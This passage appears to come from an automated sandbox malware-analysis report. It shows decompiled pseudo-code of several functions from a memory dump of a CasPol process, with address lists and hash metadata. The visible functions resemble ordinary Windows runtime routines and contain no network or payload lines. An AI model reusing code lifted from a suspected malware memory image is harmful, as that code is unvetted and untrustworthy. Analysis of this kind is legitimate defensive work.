									_t89 =  *0x14e7b9c; // 0x0
									_t92 = L01414620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01439910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = L013FA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = L0148E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = L0148E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						L014395B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                  0x0148b8d9
                                                                  0x0148b8e4
                                                                  0x00000000
                                                                  0x0148b8e6
                                                                  0x0148b8f3
                                                                  0x0148b8f5
                                                                  0x0148b8f5
                                                                  0x0148b8f8
                                                                  0x0148b920
                                                                  0x0148b924
                                                                  0x0148b936
                                                                  0x0148b939
                                                                  0x0148b93d
                                                                  0x0148b948
                                                                  0x0148b9a0
                                                                  0x0148b9a0
                                                                  0x0148b9a4
                                                                  0x0148b9bf
                                                                  0x0148b9c4
                                                                  0x0148b9c6
                                                                  0x0148b9cd
                                                                  0x0148b9d1
                                                                  0x0148bad4
                                                                  0x0148bad8
                                                                  0x0148bada
                                                                  0x0148badc
                                                                  0x0148badc
                                                                  0x0148badf
                                                                  0x0148bae0
                                                                  0x0148bae2
                                                                  0x0148bae4
                                                                  0x0148baec
                                                                  0x0148baee
                                                                  0x0148baf0
                                                                  0x0148baf0
                                                                  0x0148baec
                                                                  0x0148bafb
                                                                  0x0148bafc
                                                                  0x0148bafe
                                                                  0x0148bb01
                                                                  0x0148bb01
                                                                  0x00000000
                                                                  0x0148bb06
                                                                  0x0148b9d7
                                                                  0x0148b9db
                                                                  0x0148b9db
                                                                  0x0148b9de
                                                                  0x0148b9de
                                                                  0x0148b9e4
                                                                  0x0148b9e7
                                                                  0x0148b9ea
                                                                  0x0148b9ec
                                                                  0x0148b9ef
                                                                  0x0148b9f3
                                                                  0x0148ba1b
                                                                  0x0148ba1b
                                                                  0x0148ba23
                                                                  0x0148ba24
                                                                  0x0148ba27
                                                                  0x0148ba2a
                                                                  0x0148ba2b
                                                                  0x0148ba2e
                                                                  0x0148ba30
                                                                  0x0148ba37
                                                                  0x0148ba3f
                                                                  0x0148ba9c
                                                                  0x0148baa2
                                                                  0x0148bb13
                                                                  0x0148bb15
                                                                  0x0148baae
                                                                  0x0148baae
                                                                  0x0148bab3
                                                                  0x0148bab5
                                                                  0x0148baba
                                                                  0x0148bac8
                                                                  0x0148bac8
                                                                  0x0148baba
                                                                  0x0148bacd
                                                                  0x0148bacf
                                                                  0x00000000
                                                                  0x0148bacf
                                                                  0x0148bb1a
                                                                  0x00000000
                                                                  0x0148bb1c
                                                                  0x0148baa7
                                                                  0x0148bb11
                                                                  0x00000000
                                                                  0x0148bb11
                                                                  0x0148baa9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0148ba41
                                                                  0x0148ba41
                                                                  0x0148ba41
                                                                  0x0148ba58
                                                                  0x0148ba5d
                                                                  0x0148ba62
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0148ba64
                                                                  0x0148ba67
                                                                  0x0148ba68
                                                                  0x0148ba69
                                                                  0x0148ba6c
                                                                  0x0148ba6f
                                                                  0x0148ba71
                                                                  0x0148ba78
                                                                  0x0148ba80
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0148ba90
                                                                  0x0148ba90
                                                                  0x0148ba97
                                                                  0x00000000
                                                                  0x0148ba97
                                                                  0x0148b9f5
                                                                  0x0148b9f7
                                                                  0x0148b9f7
                                                                  0x0148b9fa
                                                                  0x0148ba03
                                                                  0x0148ba07
                                                                  0x0148ba0c
                                                                  0x0148ba10
                                                                  0x0148ba17
                                                                  0x00000000
                                                                  0x0148b9f7
                                                                  0x0148b9a6
                                                                  0x0148b9a8
                                                                  0x0148b9af
                                                                  0x0148b9b3
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0148b9b9
                                                                  0x00000000
                                                                  0x0148b9b9
                                                                  0x0148b94d
                                                                  0x0148b98f
                                                                  0x0148b995
                                                                  0x0148b999
                                                                  0x0148b960
                                                                  0x0148b967
                                                                  0x0148b968
                                                                  0x0148b96a
                                                                  0x00000000
                                                                  0x0148b96a
                                                                  0x0148b99b
                                                                  0x0148b99e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0148b99e
                                                                  0x0148b951
                                                                  0x0148b954
                                                                  0x0148b95a
                                                                  0x0148b95e
                                                                  0x0148b972
                                                                  0x0148b979
                                                                  0x0148b97d
                                                                  0x0148b97f
                                                                  0x0148b980
                                                                  0x0148b982
                                                                  0x0148b984
                                                                  0x00000000
                                                                  0x0148b984
                                                                  0x00000000
                                                                  0x0148b926
                                                                  0x00000000
                                                                  0x0148b926

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12a38f7acc35a91667cd41301d47eb52ea65f0437ee0d2629ee88725099e85e9
                                                                  • Instruction ID: aeb0d78ec9d380190e167b7e4bfef1e2e5f40db5fc2174a91104f03bb606977f
                                                                  • Opcode Fuzzy Hash: 12a38f7acc35a91667cd41301d47eb52ea65f0437ee0d2629ee88725099e85e9
                                                                  • Instruction Fuzzy Hash: E4710F32200B02AFE732EF19C840F6ABBE5EB54724F14452EE6558B7B1DBB1E941CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 013F52A5 Relevance: .2, Instructions: 161COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 78%
                                                                  			E013F52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					L0140EEF0(0x14e79a0);
					_t104 =  *0x14e8210; // 0xf92d08
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0140EB70(_t93, 0x14e79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01439890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									L0140EEF0(0x14e79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0140EB70(0, 0x14e79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xf92d15
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0142F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									L0140EEF0(0x14e79a0);
									__eflags =  *0x14e8210 - _t104; // 0xf92d08
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x14e8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01474888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0140EB70(_t95, 0x14e79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E014395D0();
											L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E014395D0();
											L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0140EB70(_t93, 0x14e79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E014395D0();
										L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E014395D0();
										L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0142F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                  0x013f52a5
                                                                  0x013f52ad
                                                                  0x013f52b0
                                                                  0x013f52b3
                                                                  0x013f52b7
                                                                  0x013f52ba
                                                                  0x013f52bf
                                                                  0x013f52c4
                                                                  0x013f52cc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x013f52ce
                                                                  0x013f52d9
                                                                  0x013f52dd
                                                                  0x013f52e7
                                                                  0x013f52f7
                                                                  0x013f52f9
                                                                  0x013f52fd
                                                                  0x01450dcf
                                                                  0x01450dd5
                                                                  0x01450dd6
                                                                  0x01450dd7
                                                                  0x01450dd8
                                                                  0x01450dd9
                                                                  0x01450dde
                                                                  0x01450ddf
                                                                  0x01450de0
                                                                  0x01450de1
                                                                  0x01450de2
                                                                  0x01450de5
                                                                  0x01450dea
                                                                  0x01450dec
                                                                  0x01450f60
                                                                  0x01450f64
                                                                  0x01450f70
                                                                  0x01450f76
                                                                  0x01450f79
                                                                  0x01450f79
                                                                  0x00000000
                                                                  0x01450f64
                                                                  0x01450df2
                                                                  0x01450df7
                                                                  0x01450e04
                                                                  0x01450e0d
                                                                  0x01450e0d
                                                                  0x01450e10
                                                                  0x01450e1a
                                                                  0x01450e1c
                                                                  0x01450e4c
                                                                  0x01450e52
                                                                  0x01450e61
                                                                  0x01450e67
                                                                  0x01450e6b
                                                                  0x01450e70
                                                                  0x01450e76
                                                                  0x01450ed7
                                                                  0x01450edc
                                                                  0x01450ee0
                                                                  0x01450ee6
                                                                  0x01450eea
                                                                  0x01450eed
                                                                  0x01450ef0
                                                                  0x01450ef3
                                                                  0x01450ef6
                                                                  0x01450ef9
                                                                  0x01450efe
                                                                  0x01450f01
                                                                  0x01450f01
                                                                  0x01450f0b
                                                                  0x01450f12
                                                                  0x01450f16
                                                                  0x01450f18
                                                                  0x01450f1b
                                                                  0x01450f2c
                                                                  0x01450f31
                                                                  0x01450f31
                                                                  0x01450f35
                                                                  0x01450f39
                                                                  0x01450f3a
                                                                  0x01450f3c
                                                                  0x01450f3f
                                                                  0x01450f50
                                                                  0x01450f55
                                                                  0x01450f55
                                                                  0x01450f59
                                                                  0x013f52eb
                                                                  0x013f52f1
                                                                  0x013f52f1
                                                                  0x01450e7d
                                                                  0x01450e84
                                                                  0x01450e88
                                                                  0x01450e8a
                                                                  0x01450e8d
                                                                  0x01450e9e
                                                                  0x01450ea3
                                                                  0x01450ea3
                                                                  0x01450ea7
                                                                  0x01450eaf
                                                                  0x01450eb3
                                                                  0x01450eb9
                                                                  0x01450eb9
                                                                  0x01450ebc
                                                                  0x01450ecd
                                                                  0x01450ecd
                                                                  0x00000000
                                                                  0x01450eb3
                                                                  0x01450e21
                                                                  0x01450e2b
                                                                  0x01450e2f
                                                                  0x01450e30
                                                                  0x01450e3a
                                                                  0x01450e3f
                                                                  0x01450e41
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01450e47
                                                                  0x00000000
                                                                  0x01450e47
                                                                  0x01450df9
                                                                  0x01450dfe
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01450dfe
                                                                  0x013f5303
                                                                  0x013f5307
                                                                  0x00000000
                                                                  0x013f5309
                                                                  0x00000000
                                                                  0x013f5309
                                                                  0x013f5307
                                                                  0x013f52e9
                                                                  0x013f52e9
                                                                  0x00000000
                                                                  0x013f52e9
                                                                  0x013f530e
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 228bc4f033d46c8aeb77c65b9cc06322fe8fa15005fd7534f9d48ff9b4ef71c4
                                                                  • Instruction ID: 9b37e5ea3b7b504fc8f8aa2e12fa20865fd693afd1c1ba88650cb54a40157be5
                                                                  • Opcode Fuzzy Hash: 228bc4f033d46c8aeb77c65b9cc06322fe8fa15005fd7534f9d48ff9b4ef71c4
                                                                  • Instruction Fuzzy Hash: D8510075104742ABD322EF6AC840B27BBE4FFA4724F14091FF995876A2E774E844C792
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01422AE4 Relevance: .2, Instructions: 159COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E01422AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x14e8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x14e8208; // 0x14e8207
				_t8 = _t57 + 0x14e8208; // 0x14e8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x14e8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x14e821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x14e6d5c; // 0x7fad0654
							_t72 =  *0x14e6d5c; // 0x7fad0654
							_t75 =  *0x14e6d5c; // 0x7fad0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x14e6d5c; // 0x7fad0654
							_t84 =  *0x14e6d5c; // 0x7fad0654
							_t87 =  *0x14e6d5c; // 0x7fad0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0143F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                  0x01422ae4
                                                                  0x01422aec
                                                                  0x01422aef
                                                                  0x01422af4
                                                                  0x01422af7
                                                                  0x01422afd
                                                                  0x01422b92
                                                                  0x01422b92
                                                                  0x01422b97
                                                                  0x01422b9c
                                                                  0x01422b9c
                                                                  0x01422b03
                                                                  0x01422b06
                                                                  0x01422b09
                                                                  0x01422b09
                                                                  0x01422b0f
                                                                  0x01422b15
                                                                  0x01422b15
                                                                  0x01422b1b
                                                                  0x01422b1e
                                                                  0x01422b21
                                                                  0x01422b26
                                                                  0x01422b29
                                                                  0x01422b81
                                                                  0x01422b84
                                                                  0x01422c0e
                                                                  0x01422c15
                                                                  0x01422c24
                                                                  0x01422c24
                                                                  0x01422b8a
                                                                  0x01422b8a
                                                                  0x01422b8a
                                                                  0x01422b8a
                                                                  0x01422b90
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01422b4a
                                                                  0x01422b4a
                                                                  0x01422b4d
                                                                  0x01422b53
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01422b55
                                                                  0x01422b58
                                                                  0x01422bb7
                                                                  0x01465d1b
                                                                  0x01465d37
                                                                  0x01465d47
                                                                  0x01465d53
                                                                  0x01422bbd
                                                                  0x01422bbd
                                                                  0x01422bbd
                                                                  0x01422bb7
                                                                  0x01422b5d
                                                                  0x01422c2f
                                                                  0x01465d5b
                                                                  0x01465d77
                                                                  0x01465d87
                                                                  0x01465d93
                                                                  0x01422c35
                                                                  0x01422c35
                                                                  0x01422c35
                                                                  0x01422c2f
                                                                  0x01422b65
                                                                  0x01422b9f
                                                                  0x01422ba2
                                                                  0x01422b67
                                                                  0x01422b67
                                                                  0x01422b69
                                                                  0x01422b6b
                                                                  0x01422b6e
                                                                  0x01422bc9
                                                                  0x01422bcc
                                                                  0x01422bcf
                                                                  0x01422bd4
                                                                  0x01422bd6
                                                                  0x01422bd6
                                                                  0x01422bdb
                                                                  0x01422c02
                                                                  0x01422c05
                                                                  0x01422c07
                                                                  0x00000000
                                                                  0x01422c07
                                                                  0x01422be0
                                                                  0x01422c00
                                                                  0x01422c3f
                                                                  0x01422c3f
                                                                  0x00000000
                                                                  0x01422c00
                                                                  0x01422be5
                                                                  0x01422be7
                                                                  0x01422bec
                                                                  0x01422bf4
                                                                  0x01422bf6
                                                                  0x00000000
                                                                  0x01422bf6
                                                                  0x01422b70
                                                                  0x01422b76
                                                                  0x01422b2b
                                                                  0x01422b2b
                                                                  0x01422b2d
                                                                  0x01422b2f
                                                                  0x01422b32
                                                                  0x01422b35
                                                                  0x01422b3a
                                                                  0x00000000
                                                                  0x01422b40
                                                                  0x01422b43
                                                                  0x01422b45
                                                                  0x01422b47
                                                                  0x01422b4a
                                                                  0x01422b4d
                                                                  0x01422b53
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01422b53
                                                                  0x01422b78
                                                                  0x01422b78
                                                                  0x01422b7b
                                                                  0x01422b7e
                                                                  0x00000000
                                                                  0x01422b7e
                                                                  0x01422b76
                                                                  0x01422ba5
                                                                  0x01422ba5
                                                                  0x01422ba8
                                                                  0x01422bad
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01422baf
                                                                  0x01422baf
                                                                  0x01422bc2
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0f9dab66214181841709d7415804898aa3e6ecebea1b9cb87829621c865a2970
                                                                  • Instruction ID: a66a2939f5569168bbdb14e7afd6568099017c602ba2132157c3ba5c93f5b7bc
                                                                  • Opcode Fuzzy Hash: 0f9dab66214181841709d7415804898aa3e6ecebea1b9cb87829621c865a2970
                                                                  • Instruction Fuzzy Hash: 5751BF76E001258F8B14CF1CC480DBDBBF1BB88700B46845BE8569B375D670AA92CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0141DBE9 Relevance: .1, Instructions: 149COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 86%
                                                                  			E0141DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						L013FCC50(E013F4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E01417D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = L014C8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E01412280(_t58, _v44);
						L0141DD82(_v44, _t102, _t98);
						E0141B944(_t102, _v5);
						return L0140FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x14e8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x14e862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x14e8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x14e862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x14bfb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
